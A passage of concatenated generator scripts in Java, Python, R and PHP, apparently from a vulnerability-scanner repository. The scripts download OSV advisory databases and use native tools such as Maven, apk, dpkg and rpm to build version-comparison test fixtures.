fmt.Fprintln(os.Stderr, err) os.Exit(1) } } ================================================ FILE: scripts/generators/GenerateMavenVersions.java ================================================ import org.apache.maven.artifact.versioning.ComparableVersion; import org.json.JSONArray; import org.json.JSONObject; import java.io.*; import java.net.URL; import java.nio.channels.Channels; import java.nio.channels.ReadableByteChannel; import java.nio.charset.StandardCharsets; import java.util.*; import java.util.stream.Collectors; import java.util.stream.IntStream; import java.util.zip.ZipEntry; import java.util.zip.ZipFile; /** * Script for generating a list of maven version comparison testdata based off * every version mentioned in the OSV Maven database, sorted using the native * Maven implementation. *

* To run this, you need to ensure copies of the following libraries are present * on the class path: * *

* The easiest way to do this is by putting the jars into a lib subfolder and then running: * * java -cp generators/lib/* generators/GenerateMavenVersions.java * */ public class GenerateMavenVersions { /** * An array of version comparisons that are known to be unsupported and so * should be commented out in the generated fixture. *

* Generally this is because the native implementation has a suspected bug * that causes the comparison to return incorrect results, and so supporting * such comparisons in the detector would in fact be wrong. */ private static final String[] UNSUPPORTED_COMPARISONS = { "0.0.0-2021-07-06T00-28-13-573087f7 < 0.0.0-2021-07-06T01-14-42-efe42242", "0.0.0-2021-12-06T00-08-57-89a33731 < 0.0.0-2021-12-06T01-21-56-e3888760", "0.0.0-2022-02-01T00-45-53-0300684a < 0.0.0-2022-02-01T05-45-16-7258ece0", "0.0.0-2022-02-28T00-18-39-7fe0d845 < 0.0.0-2022-02-28T04-15-47-83c97ebe", "0.0.0-2022-04-29T00-08-11-7086a3ec < 0.0.0-2022-04-29T01-20-09-b424f986", "0.0.0-2022-06-14T00-21-33-f21869a7 < 0.0.0-2022-06-14T02-56-29-1db980e0", "0.0.0-2022-08-16T00-14-19-aeae3dc3 < 0.0.0-2022-08-16T10-34-26-7a56f709", "0.0.0-2022-08-22T00-46-32-4652d3db < 0.0.0-2022-08-22T06-46-40-e7409ac5", "0.0.0-2022-10-31T00-42-12-322ba6b9 < 0.0.0-2022-10-31T01-23-06-c6652489", "0.0.0-2022-10-31T07-00-43-71eccd49 < 0.0.0-2022-10-31T07-05-43-97874976", "0.0.0-2022-12-01T00-02-29-fe8d6705 < 0.0.0-2022-12-01T01-56-22-5b442198", "0.0.0-2022-12-18T00-44-34-a222f475 < 0.0.0-2022-12-18T01-45-19-fec81751", "0.0.0-2023-03-20T00-52-15-4b4c0e7 < 0.0.0-2023-03-20T01-49-44-80e3135" }; public static boolean isUnsupportedComparison(String line) { return Arrays.stream(UNSUPPORTED_COMPARISONS).anyMatch(line::equals); } public static String uncomment(String line) { if(line.startsWith("#")) { return line.substring(1); } if(line.startsWith("//")) { return line.substring(2); } return line; } public static String downloadMavenDb() throws IOException { URL website = new URL("https://osv-vulnerabilities.storage.googleapis.com/Maven/all.zip"); String file = "./maven-db.zip"; ReadableByteChannel rbc = Channels.newChannel(website.openStream()); try(FileOutputStream fos = new FileOutputStream(file)) { fos.getChannel().transferFrom(rbc, 0, Long.MAX_VALUE); } return file; } public static Map> fetchPackageVersions() throws IOException { String dbPath = downloadMavenDb(); List osvs = loadOSVs(dbPath); Map> packages = new HashMap<>(); osvs.forEach(osv -> osv.getJSONArray("affected").forEach(aff -> { JSONObject affected = (JSONObject) aff; if(!affected.has("package") || affected.getJSONObject("package").getString("ecosystem").equals("Maven")) { return; } String pkgName = affected.getJSONObject("package").getString("name"); if(!affected.has("versions")) { return; } JSONArray versions = affected.getJSONArray("versions"); packages.putIfAbsent(pkgName, new ArrayList<>()); if(versions.isEmpty()) { return; } versions.forEach(version -> packages.get(pkgName).add((String) version)); })); packages.forEach((key, _ignore) -> packages.put( key, packages.get(key) .stream() .distinct() .sorted(Comparator.comparing(ComparableVersion::new)) .collect(Collectors.toList()) )); return packages; } public static List loadOSVs(String pathToDbZip) throws IOException { List osvs = new ArrayList<>(); try(ZipFile zipFile = new ZipFile(pathToDbZip)) { Enumeration entries = zipFile.entries(); while(entries.hasMoreElements()) { ZipEntry entry = entries.nextElement(); InputStream stream = zipFile.getInputStream(entry); BufferedReader streamReader = new BufferedReader(new InputStreamReader(stream, StandardCharsets.UTF_8)); StringBuilder responseStrBuilder = new StringBuilder(); String inputStr; while((inputStr = streamReader.readLine()) != null) { responseStrBuilder.append(inputStr); } osvs.add(new JSONObject(responseStrBuilder.toString())); } } return osvs; } public static void writeToFile(String outfile, List lines) throws IOException { try(PrintWriter writer = new PrintWriter(outfile, StandardCharsets.UTF_8)) { lines.forEach(writer::println); } } public static boolean compareVers(String version1, String op, String version2) { ComparableVersion v1 = new ComparableVersion(version1); ComparableVersion v2 = new ComparableVersion(version2); int r = v1.compareTo(v2); if(op.equals("=")) { return r == 0; } if(op.equals("<")) { return r < 0; } if(op.equals(">")) { return r > 0; } throw new RuntimeException("unsupported comparison operator " + op); } public static boolean compareVersions(List lines, String select) { boolean didAnyFail = false; for(String line : lines) { line = line.trim(); if(line.isEmpty() || line.startsWith("#") || line.startsWith("//")) { String maybeUnsupported = uncomment(line).trim(); if(isUnsupportedComparison(maybeUnsupported)) { System.out.printf("\033[96mS\033[0m: \033[93m%s\033[0m\n", maybeUnsupported); } continue; } String[] parts = line.split(" "); String v1 = parts[0]; String op = parts[1]; String v2 = parts[2]; boolean r = compareVers(v1, op, v2); if(!r) { didAnyFail = true; } if(select.equals("failures") && r) { continue; } if(select.equals("successes") && !r) { continue; } String color = r ? "\033[92m" : "\033[91m"; String rs = r ? "T" : "F"; System.out.printf("%s%s\033[0m: \033[93m%s\033[0m\n", color, rs, line); } return didAnyFail; } public static boolean compareVersionsInFile(String filepath, String select) throws IOException { List lines = new ArrayList<>(); try(BufferedReader br = new BufferedReader(new FileReader(filepath))) { String line = br.readLine(); while(line != null) { lines.add(line); line = br.readLine(); } } return compareVersions(lines, select); } public static List generateVersionCompares(List versions) { return IntStream.range(1, versions.size()).mapToObj(i -> { String currentVersion = versions.get(i); String previousVersion = versions.get(i - 1); String op = compareVers(currentVersion, "=", previousVersion) ? "=" : "<"; String comparison = String.format("%s %s %s", previousVersion, op, currentVersion); if(isUnsupportedComparison(comparison)) { comparison = "# " + comparison; } return comparison; }).collect(Collectors.toList()); } public static List generatePackageCompares(Map> packages) { return packages .values() .stream() .map(GenerateMavenVersions::generateVersionCompares) .flatMap(Collection::stream) .distinct() .collect(Collectors.toList()); } public static String getSelectFilter() { // set this to either "failures" or "successes" to only have those comparison results // printed; setting it to anything else will have all comparison results printed String value = System.getenv("VERSION_GENERATOR_PRINT"); if(value == null) { return "failures"; } return value; } public static void main(String[] args) throws IOException { String outfile = "internal/semantic/testdata/maven-versions-generated.txt"; Map> packages = fetchPackageVersions(); writeToFile(outfile, generatePackageCompares(packages)); String show = getSelectFilter(); boolean didAnyFail = compareVersionsInFile(outfile, show); if(didAnyFail) { System.exit(1); } } } ================================================ FILE: scripts/generators/generate-alpine-versions.py ================================================ #!/usr/bin/env python3 import atexit import json import operator import os import subprocess import sys import urllib.request import zipfile from pathlib import Path # this requires being run on an OS with docker available to run an alpine container # through which apk can be invoked to compare versions natively. # # this generator will attempt to run an alpine container in the background # for the lifetime of the generator that will be used to exec apk; this is a lot faster # than running a dedicated container for each invocation, but does mean the container # may need to be cleaned up manually if the generator explodes in a way that prevents # it from stopping the container before exiting. # # this generator also uses cache to store the results of comparisons given the large # volume of packages and versions to compare, which is stored in the /tmp directory. # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_alpine_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/Alpine/all.zip', 'alpine-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or not affected['package']['ecosystem'].startswith('Alpine'): continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): dict[package].append(AlpineVersion(version)) # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict class AlpineVersionComparer: def __init__(self, cache_path, how): self.cache_path = Path(cache_path) self.cache = {} self._alpine_version = '3.10' self._compare_method = how self._docker_container = None self._load_cache() def _start_docker_container(self): """ Starts the Alpine docker container for use in comparing versions using apk, assigning the name of the container to `self._docker_container` if success. If a container has already been started, this does nothing. """ if self._docker_container is not None: return container_name = f'alpine-{self._alpine_version}-container' cmd = ['docker', 'run', '--rm', '--name', container_name, '-d', f'alpine:{self._alpine_version}', 'tail', '-f', '/dev/null'] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'failed to start {container_name} container: {out.stderr.decode("utf-8")}') self._docker_container = container_name atexit.register(self._stop_docker_container) def _stop_docker_container(self): if self._docker_container is None: raise Exception(f'called to stop docker container when none was started') cmd = ['docker', 'stop', '-t', '0', self._docker_container] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'failed to stop {self._docker_container} container: {out.stderr.decode("utf-8")}') def _load_cache(self): if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'r') as f: lines = f.readlines() for line in lines: line = line.strip() key, result = line.split(',') if result == 'True': self.cache[key] = True continue if result == 'False': self.cache[key] = False continue print(f"ignoring invalid cache entry '{line}'") def _save_to_cache(self, key, result): self.cache[key] = result if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'a') as f: f.write(f'{key},{result}\n') def _compare_command(self, a, b): if self._compare_method == 'run': return ['docker', 'run', '--rm', f'alpine:{self._alpine_version}', 'apk', 'version', '-t', a, b] self._start_docker_container() return ['docker', 'exec', self._docker_container, 'apk', 'version', '-t', a, b] def compare(self, a, op, b): key = f'{a} {op} {b}' if key in self.cache: return self.cache[key] out = subprocess.run(self._compare_command(a, b), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0: raise Exception(f'apk did not like comparing {a} {op} {b}: {out.stderr.decode("utf-8")}') r = out.stdout.decode('utf-8').strip() == op self._save_to_cache(key, r) return r alpine_comparer = AlpineVersionComparer('/tmp/alpine-versions-generator-cache.csv', 'exec') class AlpineVersion: def __str__(self): return self.version def __hash__(self): return hash(self.version) def __init__(self, version): self.version = version def __lt__(self, other): return alpine_comparer.compare(self.version, '<', other.version) def __gt__(self, other): return alpine_comparer.compare(self.version, '>', other.version) def __eq__(self, other): return alpine_comparer.compare(self.version, '=', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(AlpineVersion(v1), op, AlpineVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_alpine_db() osvs = [] with zipfile.ZipFile('alpine-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/alpine-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-cran-versions.R ================================================ #!/usr/bin/env Rscript install.packages("jsonlite", repos = 'https://cran.r-project.org') library(utils) library(jsonlite) # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS <- c() download_cran_db <- function() { url <- "https://osv-vulnerabilities.storage.googleapis.com/CRAN/all.zip" dest <- "cran-db.zip" download.file(url, dest, method = "auto") } extract_packages_with_versions <- function(osvs) { result <- list() for (osv in osvs) { for (affected in osv$affected) { if (is.null(affected["package"]) || affected$package$ecosystem != "CRAN") { next } package <- affected$package$name if (!(package %in% names(result))) { result[[package]] <- list() } for (version in affected$versions) { tryCatch( { as.package_version(version) result[[package]] <- c(result[[package]], version) }, error = function(e) { cat(sprintf("skipping invalid version %s for %s\n", version, package)) } ) } } } # deduplicate and sort the versions for each package for (package in names(result)) { result[[package]] <- sort(numeric_version(unique(result[[package]]))) } return(result) } is_unsupported_comparison <- function(line) { line %in% UNSUPPORTED_COMPARISONS } uncomment <- function(line) { if (startsWith(line, "#")) { return(substr(line, 2, nchar(line))) } if (startsWith(line, "//")) { return(substr(line, 3, nchar(line))) } return(line) } compare <- function(v1, relate, v2) { ops <- list('<' = function(result) result < 0, '=' = function(result) result == 0, '>' = function(result) result > 0) return(ops[[relate]](compareVersion(v1, v2))) } compare_versions <- function(lines, select="all") { has_any_failed <- FALSE for (line in lines) { line <- trimws(line) if (line == "" || grepl("^#", line) || grepl("^//", line)) { maybe_unsupported <- trimws(uncomment(line)) if (is_unsupported_comparison(maybe_unsupported)) { cat(sprintf("\033[96mS\033[0m: \033[93m%s\033[0m\n", maybe_unsupported)) } next } parts <- strsplit(trimws(line), " ")[[1]] v1 <- parts[1] op <- parts[2] v2 <- parts[3] r <- compare(v1, op, v2) if (!r) { has_any_failed <- TRUE } if (select == "failures" && r) { next } if (select == "successes" && !r) { next } color <- ifelse(r, '\033[92m', '\033[91m') rs <- ifelse(r, "T", "F") cat(sprintf("%s%s\033[0m: \033[93m%s\033[0m\n", color, rs, line)) } return(has_any_failed) } compare_versions_in_file <- function(filepath, select="all") { lines <- readLines(filepath) return(compare_versions(lines, select)) } generate_version_compares <- function(versions) { comparisons <- character() for (i in seq_along(versions)) { if (i == 1) { next } comparison <- sprintf("%s < %s", versions[i - 1], versions[i]) if (is_unsupported_comparison(trimws(comparison))) { comparison <- paste("#", comparison) } comparisons <- c(comparisons, comparison) } return(comparisons) } generate_package_compares <- function(packages) { comparisons <- character() for (package in names(packages)) { versions <- packages[[package]] comparisons <- c(comparisons, generate_version_compares(versions)) } # return unique comparisons return(unique(comparisons)) } fetch_packages_versions <- function() { download_cran_db() osvs <- list() with_zip <- unzip("cran-db.zip", list = TRUE) for (fname in with_zip$Name) { osv <- jsonlite::fromJSON(unzip("cran-db.zip", files = fname, exdir = tempdir()), simplifyDataFrame = FALSE) osvs <- c(osvs, list(osv)) } return(extract_packages_with_versions(osvs)) } outfile <- "internal/semantic/testdata/cran-versions-generated.txt" packs <- fetch_packages_versions() writeLines(generate_package_compares(packs), outfile, sep = "\n") cat("\n") # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show <- Sys.getenv("VERSION_GENERATOR_PRINT", "failures") did_any_fail <- compare_versions_in_file(outfile, show) if (did_any_fail) { q(status = 1) } ================================================ FILE: scripts/generators/generate-debian-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import subprocess import sys import urllib.request import zipfile from pathlib import Path # this requires being run on an OS that has a version of "dpkg" which supports the # "--compare-versions" option; also make sure to consider the version of dpkg being # used in case there are changes to the comparing logic (last run with 1.19.7). # # also note that because of the large amount of versions being used there is # significant overhead in having to use a subprocess, so this generator caches # the results of said subprocess calls; a typical no-cache run takes about 5+ # minutes whereas with the cache it only takes seconds. # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_debian_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/Debian/all.zip', 'debian-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or not affected['package']['ecosystem'].startswith('Debian'): continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): dict[package].append(DebianVersion(version)) # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict class DebianVersionComparer: def __init__(self, cache_path): self.cache_path = Path(cache_path) self.cache = {} self._load_cache() def _load_cache(self): if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'r') as f: lines = f.readlines() for line in lines: line = line.strip() key, result = line.split(',') if result == 'True': self.cache[key] = True continue if result == 'False': self.cache[key] = False continue print(f"ignoring invalid cache entry '{line}'") def _save_to_cache(self, key, result): self.cache[key] = result if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'a') as f: f.write(f'{key},{result}\n') def compare(self, a, op, b): key = f'{a} {op} {b}' if key in self.cache: return self.cache[key] cmd = ['dpkg', '--compare-versions', a, op, b] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.stdout: print(out.stdout.decode('utf-8')) if out.stderr: print(out.stderr.decode('utf-8')) r = out.returncode == 0 self._save_to_cache(key, r) return r debian_comparer = DebianVersionComparer('/tmp/debian-versions-generator-cache.csv') class DebianVersion: def __str__(self): return self.version def __hash__(self): return hash(self.version) def __init__(self, version): self.version = version def __lt__(self, other): return debian_comparer.compare(self.version, 'lt', other.version) def __gt__(self, other): return debian_comparer.compare(self.version, 'gt', other.version) def __eq__(self, other): return debian_comparer.compare(self.version, 'eq', other.version) def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(DebianVersion(v1), op, DebianVersion(v2)) if not r: has_any_failed = r if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_debian_db() osvs = [] with zipfile.ZipFile('debian-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/debian-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-packagist-versions.php ================================================ open($path, ZipArchive::RDONLY) === false) { throw new RuntimeException('failed to read zip archive'); } return $zip; } /** * @throws JsonException * @throws RuntimeException */ function fetchPackageVersions(): array { $dbPath = downloadPackagistDb(); $dbZip = openDbZip($dbPath); $osvs = []; for ($i = 0; $i < $dbZip->numFiles; $i++) { $file = $dbZip->getFromIndex($i); if ($file === false) { throw new RuntimeException('failed to read a file from db zip'); } $osvs[] = json_decode($file, true, 512, JSON_THROW_ON_ERROR); } $packages = []; foreach ($osvs as $osv) { foreach ($osv['affected'] as $affected) { if (!isset($affected['package']) || $affected['package']['ecosystem'] !== 'Packagist') { continue; } $package = $affected['package']['name']; if (!isset($packages[$package])) { $packages[$package] = []; } if (empty($affected['versions'])) { continue; } foreach ($affected['versions'] as $version) { $packages[$package][] = $version; } } } return array_map(static function ($versions) { $uniq = array_unique($versions); usort($uniq, static fn($a, $b) => version_compare(ltrim($a, "vV"), ltrim($b, "vV"))); return $uniq; }, $packages); } /** * Normalizes the previous version such that it will compare "correctly" to the current version, * by ensuring that they both have the same "v" prefix (or lack of). * * Whether the "v" prefix is present on the normalized previous version depends on * its presences in the current version; this ensure we will have _some_ versions that * do have the "v" prefix, rather than it being present on _none_ or _all_ versions. * * @param string $currentVersion * @param string $previousVersion * * @return string */ function normalizePrevVersion(string $currentVersion, string $previousVersion): string { if (str_starts_with($currentVersion, "v")) { $previousVersion = ltrim($previousVersion, "vV"); return "v$previousVersion"; } if (str_starts_with($currentVersion, "V")) { $previousVersion = ltrim($previousVersion, "vV"); return "V$previousVersion"; } return ltrim($previousVersion, "vV"); } function generateVersionCompares(array $versions): array { $comparisons = []; foreach ($versions as $index => $version) { if ($index === 0) { continue; } $prevVersion = normalizePrevVersion($version, $versions[$index - 1]); $op = version_compare($prevVersion, $version) === 0 ? "=" : "<"; $comparison = "$prevVersion $op $version"; if (isUnsupportedComparison($comparison)) { $comparison = "# $comparison"; } $comparisons[] = $comparison; } return $comparisons; } function generatePackageCompares(array $packages): array { $comparisons = []; foreach ($packages as $versions) { $comparisons[] = generateVersionCompares($versions); } return array_merge(...$comparisons); } function compareVersions(array $lines, string $select = "all"): bool { $hasAnyFailed = false; foreach ($lines as $line) { $line = trim($line); if (empty($line) || str_starts_with($line, "#") || str_starts_with($line, "//")) { $maybeUnsupported = trim(uncomment($line)); if (isUnsupportedComparison($maybeUnsupported)) { echo "\033[96mS\033[0m: \033[93m$maybeUnsupported\033[0m\n"; } continue; } [$v1, $op, $v2] = explode(" ", $line); $r = version_compare($v1, $v2, $op); if (!$r) { $hasAnyFailed = true; } if ($select === "failures" && $r === true) { continue; } if ($select === "successes" && $r !== true) { continue; } $color = $r ? "\033[92m" : "\033[91m"; $rs = $r ? "T" : "F"; echo "$color$rs\033[0m: \033[93m$line\033[0m\n"; } return $hasAnyFailed; } $outfile = "internal/semantic/testdata/packagist-versions-generated.txt"; /** @noinspection PhpUnhandledExceptionInspection */ $packages = fetchPackageVersions(); file_put_contents($outfile, implode("\n", array_unique(generatePackageCompares($packages))) . "\n"); // set this to either "failures" or "successes" to only have those comparison results // printed; setting it to anything else will have all comparison results printed $show = getenv("VERSION_GENERATOR_PRINT") ?: "failures"; $didAnyFail = compareVersions(explode("\n", file_get_contents($outfile)), $show); if ($didAnyFail === true) { exit(1); } ================================================ FILE: scripts/generators/generate-pypi-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import packaging.version import sys import urllib.request import zipfile # this requires you run "pip install packaging" - have to be careful about versions too # because of the "legacy version" stuff # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_pypi_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip', 'pypi-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or affected['package']['ecosystem'] != 'PyPI': continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): try: dict[package].append(packaging.version.parse(version)) except packaging.version.InvalidVersion: print(f'skipping invalid version {version} for {package}') # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict def compare(v1, relate, v2): ops = {'<': operator.lt, '=': operator.eq, '>': operator.gt} return ops[relate](v1, v2) def compare_versions(lines, select='all'): has_any_failed = False for line in lines: line = line.strip() if line == '' or line.startswith('#') or line.startswith('//'): maybe_unsupported = uncomment(line).strip() if is_unsupported_comparison(maybe_unsupported): print(f'\033[96mS\033[0m: \033[93m{maybe_unsupported}\033[0m') continue v1, op, v2 = line.strip().split(' ') r = compare(packaging.version.parse(v1), op, packaging.version.parse(v2)) if not r: has_any_failed = True if select == 'failures' and r: continue if select == 'successes' and not r: continue color = '\033[92m' if r else '\033[91m' rs = 'T' if r else 'F' print(f'{color}{rs}\033[0m: \033[93m{line}\033[0m') return has_any_failed def compare_versions_in_file(filepath, select='all'): with open(filepath) as f: lines = f.readlines() return compare_versions(lines, select) def generate_version_compares(versions): comparisons = [] for i, version in enumerate(versions): if i == 0: continue comparison = f'{versions[i - 1]} < {version}\n' if is_unsupported_comparison(comparison.strip()): comparison = '# ' + comparison comparisons.append(comparison) return comparisons def generate_package_compares(packages): comparisons = [] for package in packages: versions = packages[package] comparisons.extend(generate_version_compares(versions)) # return comparisons return list(dict.fromkeys(comparisons)) def fetch_packages_versions(): download_pypi_db() osvs = [] with zipfile.ZipFile('pypi-db.zip') as db: for fname in db.namelist(): with db.open(fname) as osv: osvs.append(json.loads(osv.read().decode('utf-8'))) return extract_packages_with_versions(osvs) outfile = 'internal/semantic/testdata/pypi-versions-generated.txt' packs = fetch_packages_versions() with open(outfile, 'w') as f: f.writelines(generate_package_compares(packs)) f.write('\n') # set this to either "failures" or "successes" to only have those comparison results # printed; setting it to anything else will have all comparison results printed show = os.environ.get('VERSION_GENERATOR_PRINT', 'failures') did_any_fail = compare_versions_in_file(outfile, show) if did_any_fail: sys.exit(1) ================================================ FILE: scripts/generators/generate-redhat-versions.py ================================================ #!/usr/bin/env python3 import json import operator import os import subprocess import sys import urllib.request import zipfile from pathlib import Path # this requires being run on an OS that has a version of "rpm" installed which # supports evaluating Lua expressions (most versions do); also make sure to consider # the version of rpm being used in case there are changes to the comparing logic # (last run with 1.19.7). # # note that both alpine and debian have a "rpm" package that supports this, which # can be installed using "apk add rpm" and "apt install rpm" respectively. # # also note that because of the large amount of versions being used there is # significant overhead in having to use a subprocess, so this generator caches # the results of said subprocess calls; a typical no-cache run takes about 5+ # minutes whereas with the cache it only takes seconds. # An array of version comparisons that are known to be unsupported and so # should be commented out in the generated fixture. # # Generally this is because the native implementation has a suspected bug # that causes the comparison to return incorrect results, and so supporting # such comparisons in the detector would in fact be wrong. UNSUPPORTED_COMPARISONS = [] def is_unsupported_comparison(line): return line in UNSUPPORTED_COMPARISONS def uncomment(line): if line.startswith('#'): return line[1:] if line.startswith('//'): return line[2:] return line def download_redhat_db(): urllib.request.urlretrieve('https://osv-vulnerabilities.storage.googleapis.com/Red%20Hat/all.zip', 'redhat-db.zip') def extract_packages_with_versions(osvs): dict = {} for osv in osvs: for affected in osv['affected']: if 'package' not in affected or not affected['package']['ecosystem'].startswith('Red Hat'): continue package = affected['package']['name'] if package not in dict: dict[package] = [] for version in affected.get('versions', []): dict[package].append(RedHatVersion(version)) for rang in affected.get('ranges', []): for event in rang['events']: if 'introduced' in event and event['introduced'] != '0': dict[package].append(RedHatVersion(event['introduced'])) if 'fixed' in event: dict[package].append(RedHatVersion(event['fixed'])) # deduplicate and sort the versions for each package for package in dict: dict[package] = sorted(list(dict.fromkeys(dict[package]))) return dict class RedHatVersionComparer: def __init__(self, cache_path): self.cache_path = Path(cache_path) self.cache = {} self._load_cache() def _load_cache(self): if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'r') as f: lines = f.readlines() for line in lines: line = line.strip() key, result = line.split(',') if result == 'True': self.cache[key] = True continue if result == 'False': self.cache[key] = False continue print(f"ignoring invalid cache entry '{line}'") def _save_to_cache(self, key, result): self.cache[key] = result if self.cache_path: self.cache_path.touch() with open(self.cache_path, 'a') as f: f.write(f'{key},{result}\n') def _compare1(self, a, op, b): cmd = ['rpm', '--eval', f'%{{lua:print(rpm.vercmp("{a}", "{b}"))}}'] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0 or out.stderr: raise Exception(f'rpm did not like comparing {a} {op} {b}: {out.stderr.decode("utf-8")}') r = out.stdout.decode('utf-8').strip() if r == '0' and op == '=': return True elif r == '1' and op == '>': return True elif r == '-1' and op == '<': return True return False def _compare2(self, a, op, b): if op == '=': op = '==' # lua uses == for equality cmd = ['rpm', '--eval', f'%{{lua:print(rpm.ver("{a}") {op} rpm.ver("{b}"))}}'] out = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if out.returncode != 0 or out.stderr: raise Exception(f'rpm did not like comparing {a} {op} {b}: {out.stderr.decode("utf-8")}') r = out.stdout.decode('utf-8').strip() if r == 'True': return True elif r == 'False': return False raise Exception(f'unexpected result from rpm: {r}') def compare(self, a, op, b): key = f'{a} 